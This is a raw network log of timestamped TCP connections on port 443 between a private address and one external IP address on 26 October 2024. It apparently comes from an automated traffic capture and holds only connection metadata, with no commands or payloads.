                                                                                      Oct 26, 2024 13:44:19.769342899 CEST4434990320.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:19.769401073 CEST49903443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:19.769486904 CEST49903443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:19.769503117 CEST4434990320.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:19.770107985 CEST49914443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:19.770117044 CEST4434991420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:19.770169020 CEST49914443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:19.770225048 CEST49914443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:19.770246983 CEST4434991420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:19.770286083 CEST49914443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:19.883701086 CEST49915443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:19.883739948 CEST4434991520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:19.883802891 CEST49915443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:19.884318113 CEST49915443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:19.884330988 CEST4434991520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:21.179692030 CEST4434991520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:21.179908991 CEST49915443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:21.180011988 CEST49915443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:21.180028915 CEST4434991520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:21.180593014 CEST49922443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:21.180619955 CEST4434992220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:21.180700064 CEST49922443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:21.180954933 CEST49922443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:21.180964947 CEST4434992220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:22.459227085 CEST4434992220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:22.459368944 CEST49922443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:22.459448099 CEST49922443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:22.459470034 CEST4434992220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:22.460089922 CEST49932443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:22.460141897 CEST4434993220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:22.460215092 CEST49932443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:22.460258961 CEST49932443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:22.460333109 CEST4434993220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:22.460397005 CEST49932443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:22.572316885 CEST49933443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:22.572371960 CEST4434993320.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:22.572504997 CEST49933443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:22.572803974 CEST49933443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:22.572818995 CEST4434993320.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:23.894925117 CEST4434993320.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:23.895010948 CEST49933443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:23.895097971 CEST49933443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:23.895129919 CEST4434993320.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:23.895940065 CEST49942443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:23.895987034 CEST4434994220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:23.896070004 CEST49942443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:23.896382093 CEST49942443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:23.896406889 CEST4434994220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:25.189049006 CEST4434994220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:25.189131975 CEST49942443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:25.189201117 CEST49942443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:25.189218998 CEST4434994220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:25.189829111 CEST49949443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:25.189892054 CEST4434994920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:25.190021992 CEST49949443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:25.190073013 CEST49949443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:25.190216064 CEST4434994920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:25.190279007 CEST49949443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:25.304864883 CEST49950443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:25.304902077 CEST4434995020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:25.305078030 CEST49950443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:25.305416107 CEST49950443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:25.305444002 CEST4434995020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:26.610996962 CEST4434995020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:26.612940073 CEST49950443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:26.618087053 CEST49950443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:26.618113041 CEST4434995020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:26.618895054 CEST49958443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:26.618943930 CEST4434995820.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:26.619016886 CEST49958443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:26.619437933 CEST49958443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:26.619452953 CEST4434995820.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:27.907007933 CEST4434995820.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:27.907062054 CEST49958443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:27.907361031 CEST49958443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:27.907382965 CEST4434995820.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:27.908348083 CEST49964443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:27.908381939 CEST4434996420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:27.908441067 CEST49964443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:27.908576965 CEST49964443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:27.908611059 CEST4434996420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:27.908653021 CEST49964443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:28.023642063 CEST49965443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:28.023693085 CEST4434996520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:28.023793936 CEST49965443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:28.024102926 CEST49965443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:28.024116039 CEST4434996520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:29.318675995 CEST4434996520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:29.318794012 CEST49965443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:29.318886042 CEST49965443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:29.318907022 CEST4434996520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:29.319535017 CEST49971443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:29.319577932 CEST4434997120.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:29.319658995 CEST49971443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:29.320118904 CEST49971443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:29.320142031 CEST4434997120.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:30.636925936 CEST4434997120.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:30.637096882 CEST49971443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:30.637190104 CEST49971443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:30.637233019 CEST4434997120.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:30.637784004 CEST49979443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:30.637836933 CEST4434997920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:30.637917995 CEST49979443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:30.637984991 CEST49979443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:30.638036013 CEST4434997920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:30.638077974 CEST49979443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:30.744241953 CEST49980443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:30.744313002 CEST4434998020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:30.744414091 CEST49980443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:30.744667053 CEST49980443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:30.744684935 CEST4434998020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:32.042202950 CEST4434998020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:32.042278051 CEST49980443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:32.042382002 CEST49980443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:32.042399883 CEST4434998020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:32.042936087 CEST49986443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:32.042975903 CEST4434998620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:32.043076038 CEST49986443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:32.043359995 CEST49986443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:32.043376923 CEST4434998620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:33.330159903 CEST4434998620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:33.330260038 CEST49986443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:33.330346107 CEST49986443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:33.330358982 CEST4434998620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:33.331002951 CEST49994443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:33.331043959 CEST4434999420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:33.331145048 CEST49994443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:33.331259012 CEST49994443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:33.331348896 CEST4434999420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:33.331415892 CEST49994443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:33.445760012 CEST49995443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:33.445807934 CEST4434999520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:33.445924997 CEST49995443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:33.446238041 CEST49995443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:33.446250916 CEST4434999520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:34.763803959 CEST4434999520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:34.763942003 CEST49995443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:34.763991117 CEST49995443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:34.764007092 CEST4434999520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:34.764540911 CEST50004443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:34.764558077 CEST4435000420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:34.764637947 CEST50004443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:34.764812946 CEST50004443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:34.764822960 CEST4435000420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:36.076365948 CEST4435000420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:36.076493025 CEST50004443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:36.076596975 CEST50004443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:36.076621056 CEST4435000420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:36.077339888 CEST50009443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:36.077393055 CEST4435000920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:36.077487946 CEST50009443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:36.077603102 CEST50009443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:36.077645063 CEST4435000920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:36.077701092 CEST50009443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:36.182794094 CEST50010443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:36.182848930 CEST4435001020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:36.182965040 CEST50010443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:36.183238029 CEST50010443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:36.183254957 CEST4435001020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:37.488301992 CEST4435001020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:37.488476038 CEST50010443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:37.488538980 CEST50010443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:37.488569021 CEST4435001020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:37.489433050 CEST50019443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:37.489476919 CEST4435001920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:37.489629030 CEST50019443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:37.489931107 CEST50019443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:37.489949942 CEST4435001920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:38.770442009 CEST4435001920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:38.770608902 CEST50019443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:38.770669937 CEST50019443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:38.770687103 CEST4435001920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:38.771348000 CEST50025443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:38.771394968 CEST4435002520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:38.771491051 CEST50025443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:38.771559954 CEST50025443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:38.771663904 CEST4435002520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:38.771718979 CEST50025443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:38.884423018 CEST50026443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:38.884470940 CEST4435002620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:38.884586096 CEST50026443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:38.884947062 CEST50026443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:38.884959936 CEST4435002620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:40.165174007 CEST4435002620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:40.165251017 CEST50026443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:40.165333033 CEST50026443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:40.165344000 CEST4435002620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:40.165901899 CEST50037443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:40.165935993 CEST4435003720.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:40.165997982 CEST50037443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:40.166208982 CEST50037443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:40.166218042 CEST4435003720.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:41.446666002 CEST4435003720.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:41.446994066 CEST50037443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:41.446994066 CEST50037443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:41.447540045 CEST50044443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:41.447586060 CEST4435004420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:41.447654963 CEST50044443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:41.447704077 CEST50044443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:41.447762012 CEST4435004420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:41.447819948 CEST50044443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:41.554766893 CEST50045443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:41.554821968 CEST4435004520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:41.554900885 CEST50045443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:41.555145025 CEST50045443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:41.555160999 CEST4435004520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:41.757359028 CEST50037443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:41.757380009 CEST4435003720.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:42.835925102 CEST4435004520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:42.835987091 CEST50045443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:42.836046934 CEST50045443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:42.836057901 CEST4435004520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:42.836555958 CEST50056443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:42.836611986 CEST4435005620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:42.836690903 CEST50056443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:42.836857080 CEST50056443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:42.836889982 CEST4435005620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:44.130695105 CEST4435005620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:44.130780935 CEST50056443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:44.130857944 CEST50056443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:44.130877018 CEST4435005620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:44.131540060 CEST50061443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:44.131568909 CEST4435006120.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:44.131629944 CEST50061443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:44.131681919 CEST50061443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:44.131721973 CEST4435006120.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:44.131764889 CEST50061443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:44.242450953 CEST50062443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:44.242499113 CEST4435006220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:44.242641926 CEST50062443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:44.243016005 CEST50062443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:44.243026018 CEST4435006220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:45.642359972 CEST4435006220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:45.642472029 CEST50062443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:45.642642975 CEST50062443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:45.642668009 CEST4435006220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:45.643702030 CEST50063443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:45.643769979 CEST4435006320.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:45.643867970 CEST50063443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:45.644247055 CEST50063443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:45.644259930 CEST4435006320.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:46.964005947 CEST4435006320.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:46.964153051 CEST50063443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:46.996109962 CEST50063443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:46.996164083 CEST4435006320.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:46.996680975 CEST50064443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:46.996710062 CEST4435006420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:46.996786118 CEST50064443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:46.996836901 CEST50064443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:46.996951103 CEST4435006420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:46.997009039 CEST50064443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:47.139780045 CEST50065443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:47.139821053 CEST4435006520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:47.139905930 CEST50065443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:47.140378952 CEST50065443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:47.140394926 CEST4435006520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:48.416106939 CEST4435006520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:48.416245937 CEST50065443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:48.416333914 CEST50065443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:48.416352034 CEST4435006520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:48.417047977 CEST50066443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:48.417105913 CEST4435006620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:48.417190075 CEST50066443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:48.417512894 CEST50066443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:48.417534113 CEST4435006620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:49.720860004 CEST4435006620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:49.721024990 CEST50066443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:49.721024990 CEST50066443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:49.721558094 CEST50067443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:49.721594095 CEST4435006720.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:49.721646070 CEST50067443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:49.721688986 CEST50067443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:49.721745014 CEST4435006720.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:49.721784115 CEST50067443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:49.836157084 CEST50068443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:49.836220026 CEST4435006820.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:49.836410999 CEST50068443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:49.836764097 CEST50068443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:49.836781025 CEST4435006820.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:50.023264885 CEST50066443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:50.023319960 CEST4435006620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:51.344717026 CEST4435006820.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:51.344996929 CEST50068443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:51.345076084 CEST50068443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:51.345093012 CEST4435006820.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:51.345824957 CEST50069443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:51.345855951 CEST4435006920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:51.345940113 CEST50069443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:51.346239090 CEST50069443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:51.346246958 CEST4435006920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:52.647923946 CEST4435006920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:52.648092985 CEST50069443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:52.648202896 CEST50069443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:52.648222923 CEST4435006920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:52.649050951 CEST50070443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:52.649096012 CEST4435007020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:52.649182081 CEST50070443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:52.649230003 CEST50070443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:52.649532080 CEST4435007020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:52.649585962 CEST50070443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:52.758186102 CEST50071443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:52.758212090 CEST4435007120.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:52.758301973 CEST50071443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:52.758618116 CEST50071443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:52.758630037 CEST4435007120.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:54.060641050 CEST4435007120.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:54.060795069 CEST50071443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:54.060889959 CEST50071443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:54.060911894 CEST4435007120.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:54.061558962 CEST50072443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:54.061595917 CEST4435007220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:54.061664104 CEST50072443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:54.061908007 CEST50072443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:54.061919928 CEST4435007220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:55.326893091 CEST4435007220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:55.326983929 CEST50072443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:55.327069044 CEST50072443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:55.327086926 CEST4435007220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:55.327656984 CEST50073443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:55.327694893 CEST4435007320.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:44:55.327775955 CEST50073443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:55.327819109 CEST50073443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:44:55.327980995 CEST4435007320.25.126.96192.168.2.6
